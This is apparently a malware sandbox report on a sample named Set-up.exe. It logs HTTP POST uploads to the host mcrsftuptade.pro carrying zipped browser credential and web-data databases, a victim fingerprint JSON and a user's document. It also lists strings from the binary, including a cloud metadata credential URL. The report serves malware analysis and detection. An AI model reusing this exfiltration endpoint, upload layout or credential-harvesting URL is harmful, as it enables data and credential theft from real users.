Source: global traffic	HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 623250Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 33 2e 64 62 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 90 a5 8e 8e 00 80 04 00 00 80 04 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 34 2e 64 62 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 80 00 01 01 00 40 20 20 00 00 00 02 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 2e 6a d0 0d 7f f8 00 08 7a 3c 00 7b ee 7f c3 7b a9 7b 61 7b 1f 7a db 7a 3c 7a aa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: POST /Up/p HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 489Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 ff 07 87 57 37 01 00 00 37 01 00 00 28 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 7b 22 6f 22 3a 22 57 69 6e 64 6f 77 73 20 31 30 22 2c 22 75 6e 22 3a 22 61 6c 66 6f 6e 73 22 2c 22 70 22 3a 22 41 4c 46 4f 4e 53 2d 50 43 22 2c 22 61 22 3a 22 78 36 34 22 2c 22 63 22 3a 34 2c 22 6c 22 3a 22 31 37 34 36 38 35 37 31 32 36 31 34 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 62 74 22 3a 22 5a 41 45 42 41 22 2c 22 68 69 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 64 6e 22 3a 22 6e 75 6c 6c 22 2c 22 64 70 22 3a 22 32 32 32 22 2c 22 73 22 3a 22 31 32 38 30 78 31 30 32 34 22 2c 22 72 22 3a 34 30 39 35 2c 22 65 6c 22 3a 66 61 6c 73 65 2c 22 6c 74 22 3a 22 6e 75 6c 6c 22 2c 22 69 73 22 3a 5b 5d 2c 22 6c 69 22 3a 5b 5d 2c 22 70 6c 22 3a 5b 5d 2c 22 67 22 3a 5b 22 4d 69 63 72 6f 73 6f 66 74 20 42 61 73 69 63 20 44 69 73 70 6c 61 79 20 41 64 61 70 74 65 72 22 5d 7d 50 4b 01 02 14 00 14 00 00 00 00 00 5c 64 21 52 ff 07 87 57 37 01 00 00 37 01 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 50 4b 05 06 00 00 00 00 01 00 01 00 56 00 00 00 7d 01 00 00 00 00 Data Ascii: PK\d!RW77(f1575b64-8492-4e8b-b102-4d26e8c70371.txt{"o":"Windows 10","un":"user","p":"user-PC","a":"x64","c":4,"l":"1746857126149e146be9-c76a-4720-bcdb-53011b87bd06","bt":"ZAEBA","hi":"9e146be9-c76a-4720-bcdb-53011b87bd06","dn":"null","dp":"222","s":"1280x1024","r":4095,"el":false,"lt":"null","is":[],"li":[],"pl":[],"g":["Microsoft Basic Display Adapter"]}PK\d!RW77(f1575b64-8492-4e8b-b102-4d26e8c70371.txtPKV}
Source: global traffic	HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 139949Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 ca 34 d2 61 00 20 02 00 00 20 02 00 0f 00 00 00 62 2f 63 38 2f 30 2f 57 65 62 20 44 61 74 61 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 05 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 4a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 2e 7a 70 05 00 00 00 05 07 e7 00 00 00 00 3c 07 fb 07 f6 07 f1 07 ec 07 e7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 197293Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 70 c7 0d af 00 00 03 00 00 00 03 00 0f 00 00 00 62 2f 63 39 2f 30 2f 57 65 62 20 44 61 74 61 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 09 00 00 00 59 00 00 00 00 00 00 00 00 00 00 00 36 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 00 2e 6a d0 05 00 00 00 08 07 d8 00 00 00 00 57 07 fb 07 f6 07 f1 07 ec 07 e7 07 e2 07 dd 07 d8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 524954Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 33 2e 64 62 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 90 a5 8e 8e 00 80 04 00 00 80 04 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 34 2e 64 62 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 80 00 01 01 00 40 20 20 00 00 00 02 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 2e 6a d0 0d 7f f8 00 08 7a 3c 00 7b ee 7f c3 7b a9 7b 61 7b 1f 7a db 7a 3c 7a aa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: POST /Up/g HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 14530Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 61 52 b7 be 30 00 00 00 30 00 00 00 28 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 31 37 34 36 38 35 37 31 32 36 31 34 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 73 f2 4d 06 02 04 00 00 02 04 00 00 33 00 00 00 67 2f 55 73 65 72 73 2f 61 6c 66 6f 6e 73 2f 44 6f 63 75 6d 65 6e 74 73 2f 53 51 52 4b 48 4e 42 4e 59 4e 2f 53 51 52 4b 48 4e 42 4e 59 4e 2e 64 6f 63 78 53 51 52 4b 48 4e 42 4e 59 4e 45 54 44 43 49 4c 57 49 4b 4c 4e 52 59 48 4a 5a 55 50 43 59 56 54 4a 4a 4b 41 42 59 59 4e 56 45 4a 5a 42 46 4a 47 49 55 5a 45 46 55 48 43 4f 5a 5a 49 53 51 45 4c 5a 55 4c 4d 41 50 46 49 42 55 53 56 47 47 53 58 53 56 5a 52 4e 4a 58 46 56 55 45 49 4b 42 51 4e 41 52 45 4c 4b 4a 45 4a 5a 54 45 42 47 58 49 46 54 42 47 44 58 42 53 59 46 4a 4b 46 49 43 4d 4c 4f 4d 48 5a 5a 53 49 4a 4d 50 49 58 5a 4d 51 55 4c 48 41 5a 57 4e 4f 43 53 43 4c 57 54 4e 4a 4d 43 47 56 51 41 4f 50 59 54 5a 56 52 4c 43 4b 53 55 50 53 4d 57 56 4f 46 43 50 4a 41 4f 4e 47 51 42 50 4c 4d 51 55 54 5a 53 46 59 52 49 42 44 5a 57 42 58 49 45 44 4a 49 53 4d 43 54 47 54 59 4b 45 49 58 57 56 44 56 4f 47 4d 46 55 4e 52 4a 44 4e 45 47 4a 4c 56 57 4e 41 43 42 42 47 49 49 52 54 41 48 47 55 4d 53 4c 53 49 5a 4e 47 54 52 41 55 47 4d 5a 54 56 47 4c 49 41 4b 4c 4c 4b 4a 47 4b 42 4d 58 49 46 50 4f 59 43 51 58 4a 5a 4b 4a 48 54 4c 4e 5a 47 44 43 4c 4d 58 54 59 4f 42 47 46 41 50 4f 51 43 4a 47 52 41 4b 4f 52 4b 47 47 57 50 42 4f 4a 4c 4f 5a 41 54 4b 44 5a 59 46 44 53 4f 4e 55 5a 4f 47 42 46 52 44 42 55 4b 5a 54 56 59 5a 47 58 44 45 57 55 4f 58 4e 57 48 4d 4f 49 42 56 4f 57 4e 57 46 47 42 48 53 44 54 51 51 4b 58 57 5a 45 48 51 4c 41 59 49 58 4f 56 5a 45 45 5a 4e 45 53 4b 4b 57 49 54 59 50 49 44 43 4d 46 48 54 57 56 48 4d 48 46 43 47 4e 45 42 4e 56 42 53 53 51 48 4d 52 53 57 4c 48 56 4d 41 5a 45 52 49 55 46 54 52 58 45 56 5a 48 4b 52 58 57 4f 4d 47 45 54 4a 4a 46 42 52 4c 46 49 42 52 47 4c 41 51 4b 4c 44 46 5a 45 47 48 4c 5a 53 56 41 4d 58 4d 4e 43 43 55 52 4f 58 47 51 4f 4d 44 51 4a 53 4b 55 4e 4f 47 4c 47 59 59 54 56 41 42 45 53 49 44 48 41 53 44 52 41 43 4c 4f 46 45 57 47 50 59 4c 45 4f 52 58 53 59 44 52 44 47 50 47 4f 58 48 49 41 49 53 42 5a 42 44 52 4e 56 51 4a 58 58 49 42 4e 42 58 4d 44 53 4b 58 50 42 53 43 47 4b 47 50 41 53 47 4e 4f 49 44 4b 49 42 46 4a 57 55 49 52 51 48 5a 4c 58 5a 51 56 48 55 45 48 4d 48 54 52 44 57 4b 47 4a 56 51 48 57 46 51 45 42 4a 49 42 51 4c 44 57 51 48 4f 51 4c 58 53 50 46 50 4c 57 50 59 5a 52 4f 59 44 41 51 4f 4f 4f 59 4b 54 50 56 46 51 58 4c 4d 4c 52 44 59 53 56 58 56 41 57 43 45 47 56 53 48 47 44 56 53 48 4f 4e 51 55 41 56 43 42 42 48 4a 52 54 49 4a 41 59 58 55 49 4c 48 4e 47 48 49 58 46 4a 50 4a 46 41 55 44 49 4a 46 4

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3

Source: global traffic

HTTP traffic detected: GET /ujs/f1575b64-8492-4e8b-b102-4d26e8c70371 HTTP/1.1Host: mcrsftuptade.proConnection: close

Source: global traffic

DNS traffic detected: DNS query: c.pki.goog

Source: unknown

HTTP traffic detected: POST /Up HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 291Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 6b 5b 94 e6 71 00 00 00 71 00 00 00 28 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 7b 22 6c 22 3a 22 31 37 34 36 38 35 37 31 32 36 31 34 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 62 74 22 3a 22 5a 41 45 42 41 22 2c 22 68 69 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 7d 50 4b 01 02 14 00 14 00 00 00 00 00 5c 64 21 52 6b 5b 94 e6 71 00 00 00 71 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 50 4b 05 06 00 00 00 00 01 00 01 00 56 00 00 00 b7 00 00 00 00 00 Data Ascii: PK\d!Rk[qq(f1575b64-8492-4e8b-b102-4d26e8c70371.txt{"l":"1746857126149e146be9-c76a-4720-bcdb-53011b87bd06","bt":"ZAEBA","hi":"9e146be9-c76a-4720-bcdb-53011b87bd06"}PK\d!Rk[qq(f1575b64-8492-4e8b-b102-4d26e8c70371.txtPKV

Source: Set-up.exe	String found in binary or memory: http://169.254.169.254/latest/meta-data/iam/security-credentials/Retrieving
Source: Set-up.exe	String found in binary or memory: http://XXXXXXwinscp.net/
Source: Set-up.exe	String found in binary or memory: http://XXXXwinscp.net/forum/
Source: Set-up.exe	String found in binary or memory: http://acs.amazonaws.com/groups/global/AllUsers
Source: Set-up.exe	String found in binary or memory: http://acs.amazonaws.com/groups/global/AuthenticatedUsers
Source: Set-up.exe	String found in binary or memory: http://acs.amazonaws.com/groups/s3/LogDelivery
Source: Set-up.exe	String found in binary or memory: http://apache.org/dav/props/
Source: Set-up.exe	String found in binary or memory: http://apache.org/dav/props/T
Source: Set-up.exe	String found in binary or memory: http://apache.org/dav/propset/fs/1
